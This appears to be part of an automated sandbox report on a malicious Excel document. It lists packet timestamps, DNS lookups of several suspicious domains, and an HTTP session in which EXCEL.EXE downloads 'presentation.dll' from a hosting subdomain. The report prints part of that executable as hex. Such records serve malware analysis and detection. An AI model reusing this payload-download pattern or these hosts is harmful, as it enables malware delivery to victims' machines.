                                                                                                                                                                            May 3, 2021 19:48:16.814127922 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814151049 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814167023 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814189911 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814207077 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814229012 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814251900 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814266920 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814289093 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814306974 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814321041 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814343929 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814357996 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814390898 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814398050 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814435959 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814452887 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814475060 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814495087 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814503908 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.814541101 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:16.814558029 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:21.813452005 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:21.813596964 CEST4974080192.168.2.4162.241.24.47
                                                                                                                                                                            May 3, 2021 19:48:51.873781919 CEST8049740162.241.24.47192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:26.047764063 CEST4976580192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:26.047817945 CEST4976480192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:26.172405958 CEST804976534.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:26.172455072 CEST804976434.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:26.172761917 CEST4976580192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:26.173763037 CEST4976580192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:26.173763037 CEST4976480192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:26.339246988 CEST804976534.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:26.929080009 CEST804976534.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:26.929781914 CEST4976580192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:26.930757999 CEST4976580192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:49:27.055741072 CEST804976534.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:28.084047079 CEST4976480192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.094882011 CEST4977980192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.095599890 CEST4978080192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.219225883 CEST804977934.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:10.219353914 CEST4977980192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.219878912 CEST4977980192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.220418930 CEST804978034.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:10.220511913 CEST4978080192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.387370110 CEST804977934.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:10.962115049 CEST804977934.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:10.962344885 CEST4977980192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:10.968224049 CEST4977980192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:11.092386007 CEST804977934.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:12.009726048 CEST4978080192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:34.137907028 CEST4978180192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:34.138166904 CEST4978280192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:34.264683008 CEST804978234.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:34.264905930 CEST4978280192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:34.265055895 CEST804978134.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:34.265242100 CEST4978180192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:34.266048908 CEST4978280192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:34.431782007 CEST804978234.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:35.009057999 CEST804978234.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:35.009167910 CEST4978280192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:35.010200977 CEST4978280192.168.2.434.86.224.8
                                                                                                                                                                            May 3, 2021 19:50:35.134429932 CEST804978234.86.224.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:36.055557013 CEST4978180192.168.2.434.86.224.8

                                                                                                                                                                            UDP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            May 3, 2021 19:47:58.020844936 CEST6464653192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:47:58.072629929 CEST53646468.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:47:58.117489100 CEST6529853192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:47:58.195224047 CEST53652988.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:47:59.453775883 CEST6529853192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:47:59.511570930 CEST53652988.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:47:59.682372093 CEST5912353192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:47:59.734302044 CEST53591238.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:47:59.765811920 CEST5453153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:47:59.814438105 CEST53545318.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:00.753032923 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:00.801937103 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:01.510534048 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:01.569550037 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:02.537785053 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:02.588073015 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:03.540112972 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:03.589113951 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:04.799597979 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:04.858560085 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:06.981548071 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:07.033443928 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:09.547194004 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:09.600395918 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:10.447953939 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:10.496746063 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:10.745537043 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:10.819489002 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:11.303186893 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:11.382322073 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:11.743668079 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:11.800832987 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:12.310800076 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:12.384352922 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:13.346000910 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:13.406004906 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:14.271812916 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:14.323384047 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:15.361022949 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:15.421334028 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:15.532649994 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:15.589939117 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:15.659585953 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:15.717000008 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:16.480113029 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:16.540180922 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:17.712814093 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:17.761617899 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:18.549732924 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:18.598401070 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:19.378334999 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:19.431777000 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:22.490780115 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:22.539602995 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:23.475693941 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:23.526113987 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:24.371949911 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:24.429546118 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:25.530097008 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:25.581655025 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:26.550929070 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:26.602658987 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:27.394934893 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:27.443691015 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:28.273298025 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:28.322206020 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:33.605958939 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:33.655102968 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:35.654012918 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:35.715250015 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:53.880641937 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:53.948237896 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:48:54.745251894 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:48:54.804958105 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:07.573806047 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:07.623661041 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:09.973408937 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:10.031073093 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:15.541081905 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:15.599922895 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:24.242067099 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:24.303713083 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:25.680222034 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:26.036195993 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:31.493801117 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:31.602425098 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:32.183551073 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:32.283015966 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:32.868941069 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:32.925901890 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:33.426692009 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:33.446129084 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:33.492338896 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:33.563680887 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:34.139262915 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:34.356014013 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:35.054305077 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:35.116791964 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:35.808538914 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:35.874460936 CEST53642068.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:36.826643944 CEST5090453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:36.875463009 CEST53509048.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:37.749708891 CEST5752553192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:37.806780100 CEST53575258.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:38.293924093 CEST5381453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:38.343143940 CEST53538148.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:47.344005108 CEST5341853192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:47.392643929 CEST53534188.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:48.542215109 CEST6283353192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:48.599294901 CEST53628338.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:54.223151922 CEST5926053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:54.280756950 CEST53592608.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:55.230763912 CEST5926053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:55.279725075 CEST53592608.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:56.229562998 CEST5926053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:56.278135061 CEST53592608.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:49:58.241703033 CEST5926053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:49:58.290160894 CEST53592608.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:02.242307901 CEST5926053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:50:02.299491882 CEST53592608.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:08.758569956 CEST4994453192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:50:08.816771984 CEST53499448.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:09.725045919 CEST6330053192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:50:10.070560932 CEST53633008.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:32.552212954 CEST6144953192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:50:32.614394903 CEST53614498.8.8.8192.168.2.4
                                                                                                                                                                            May 3, 2021 19:50:33.747190952 CEST5127553192.168.2.48.8.8.8
                                                                                                                                                                            May 3, 2021 19:50:34.115576029 CEST53512758.8.8.8192.168.2.4

                                                                                                                                                                            ICMP Packets

                                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                            May 3, 2021 19:47:59.511733055 CEST192.168.2.48.8.8.8d0e8(Port unreachable)Destination Unreachable

                                                                                                                                                                            DNS Queries

                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                            May 3, 2021 19:48:15.659585953 CEST192.168.2.48.8.8.80x2fc0Standard query (0)docs.atu.ngr.mybluehost.meA (IP address)IN (0x0001)
                                                                                                                                                                            May 3, 2021 19:49:25.680222034 CEST192.168.2.48.8.8.80xb4e6Standard query (0)app.buboleinov.comA (IP address)IN (0x0001)
                                                                                                                                                                            May 3, 2021 19:50:09.725045919 CEST192.168.2.48.8.8.80x4f0fStandard query (0)chat.billionady.comA (IP address)IN (0x0001)
                                                                                                                                                                            May 3, 2021 19:50:33.747190952 CEST192.168.2.48.8.8.80xf1cfStandard query (0)app3.maintorna.comA (IP address)IN (0x0001)

                                                                                                                                                                            DNS Answers

                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                            May 3, 2021 19:48:15.717000008 CEST8.8.8.8192.168.2.40x2fc0No error (0)docs.atu.ngr.mybluehost.me162.241.24.47A (IP address)IN (0x0001)
                                                                                                                                                                            May 3, 2021 19:49:26.036195993 CEST8.8.8.8192.168.2.40xb4e6No error (0)app.buboleinov.com34.86.224.8A (IP address)IN (0x0001)
                                                                                                                                                                            May 3, 2021 19:50:10.070560932 CEST8.8.8.8192.168.2.40x4f0fNo error (0)chat.billionady.com34.86.224.8A (IP address)IN (0x0001)
                                                                                                                                                                            May 3, 2021 19:50:34.115576029 CEST8.8.8.8192.168.2.40xf1cfNo error (0)app3.maintorna.com34.86.224.8A (IP address)IN (0x0001)

                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                            • docs.atu.ngr.mybluehost.me
                                                                                                                                                                            • app.buboleinov.com
                                                                                                                                                                            • chat.billionady.com
                                                                                                                                                                            • app3.maintorna.com

                                                                                                                                                                            HTTP Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            0192.168.2.449740162.241.24.4780C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            May 3, 2021 19:48:15.894133091 CEST1234OUTGET /presentation.dll HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                            Host: docs.atu.ngr.mybluehost.me
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            May 3, 2021 19:48:16.084395885 CEST1321INHTTP/1.1 200 OK
                                                                                                                                                                            Date: Mon, 03 May 2021 17:48:15 GMT
                                                                                                                                                                            Server: Apache
                                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                                            Connection: Upgrade, Keep-Alive
                                                                                                                                                                            Last-Modified: Mon, 03 May 2021 13:17:32 GMT
                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                            Content-Length: 312832
                                                                                                                                                                            Cache-Control: max-age=10800
                                                                                                                                                                            Expires: Mon, 03 May 2021 20:48:15 GMT
                                                                                                                                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                                                                                                                            X-Endurance-Cache-Level: 2
                                                                                                                                                                            Keep-Alive: timeout=5, max=75
                                                                                                                                                                            Content-Type: application/x-msdownload
                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 d4 f0 e2 dc b5 9e b1 dc b5 9e b1 dc b5 9e b1 c2 e7 0b b1 cc b5 9e b1 c2 e7 1d b1 81 b5 9e b1 d5 cd 0d b1 d9 b5 9e b1 dc b5 9f b1 b4 b5 9e b1 c2 e7 1a b1 c3 b5 9e b1 c2 e7 0c b1 dd b5 9e b1 c2 e7 0a b1 dd b5 9e b1 c2 e7 0f b1 dd b5 9e b1 52 69 63 68 dc b5 9e b1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 df 48 6e 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 90 04 00 00 94 10 00 00 00 00 00 d2 3b 03 00 00 10 00 00 00 a0 04 00 00 00 00 01 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 15 00 00 04 00 00 aa f9 04 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 9f 04 00 54 00 00 00 9c 95 04 00 3c 00 00 00 00 20 15 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 15 00 d0 10 00 00 f0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9e 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 8f 04 00 00 10 00 00 00 90 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 71 10 00 00 a0 04 00 00 10 00 00 00 94 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 03 00 00 00 20 15 00 00 04 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 1d 00 00 00 30 15 00 00 1e 00 00 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$RichPELHn`!;P@`T< 0@.text `.dataHq@.rsrc @@.reloc0@B
                                                                                                                                                                            May 3, 2021 19:48:16.084423065 CEST1322INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                            Data Ascii: ,n^H6 p|
                                                                                                                                                                            May 3, 2021 19:48:16.084435940 CEST1323INData Raw: d2 ec 41 6f 06 3f 88 b6 f5 e2 f6 24 07 a5 60 8e 49 07 9b c9 cb b3 1a 49 12 45 a0 ce 76 c2 f9 cc 36 48 d8 13 ea 05 a1 ce b3 d0 24 55 37 51 a5 d1 b7 ce 1e 53 35 4b 60 8e 48 f1 a7 d1 b3 cd 22 51 35 4d a0 ce 2e b3 25 51 ff 7d a8 0e 4f 22 a5 d3 bf 48
                                                                                                                                                                            Data Ascii: Ao?$`IIEv6H$U7QS5K`H"Q5M.%Q}O"HT]urUB@HK;T2o}^shP~e~yb"Q lBLH$Np/88q`( "q|6u`?99Nq(yP}}
                                                                                                                                                                            May 3, 2021 19:48:16.084449053 CEST1325INData Raw: 7b 7b 7b 7b fa fa fa fa 78 78 78 78 12 fa fa fa b8 e3 39 53 6f 6a ca 7d 73 7d 93 ef cf 78 f1 fb 17 e8 49 fe b5 8b f3 29 cc 7b f2 c8 47 ec 4d fa f3 3e 44 f1 79 17 ec 4d b8 35 0b 4d 6b ca 7d 2b 73 4d f5 ec cf 78 2e 12 f8 96 76 b0 35 38 b5 83 58 69
                                                                                                                                                                            Data Ascii: {{{{xxxx9Soj}s}xI){GM>DyM5Mk}+sMx.v58Xi{-yAckxq;}b}Ix]xubL|V{kckMq}wwxxuqhm{;qInx<vkIuzRxP8K{{*iqoxsyeuMxI9
                                                                                                                                                                            May 3, 2021 19:48:16.084465981 CEST1326INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fc fc fc ff f0 f0 f0 ff e1 e1 e1 ff c3 d9 d5 ff 91 d7 cd ff 5d d6 c3 ff 4a d4 bf ff 49 d4 bf ff 49 d4 be ff 49 d3 be ff 49 d3 bd ff 44 c4 b0 ff 37
                                                                                                                                                                            Data Ascii: ]JIIIID7;@;740-+(%#~"}zxvsrpm~k|hzkVgRbM3
                                                                                                                                                                            May 3, 2021 19:48:16.084486008 CEST1327INData Raw: e9 bd ff 01 7d 68 ff 07 7f 6c ff 0c 82 6f ff 11 85 72 ff 15 88 75 ff 1a 8b 79 ff 1f 8f 7c ff 21 91 7e ff 25 94 82 ff 28 96 83 ff 2a 97 85 ff 2c 99 87 ff 2e 9c 89 ff 32 a1 8d ff 34 a5 91 ff 37 aa 96 ff 3a b1 9b ff 3e b9 a3 ff 43 c4 ad ff 3b a9 94
                                                                                                                                                                            Data Ascii: }hloruy|!~%(*,.247:>C;2x5z;LQQPj
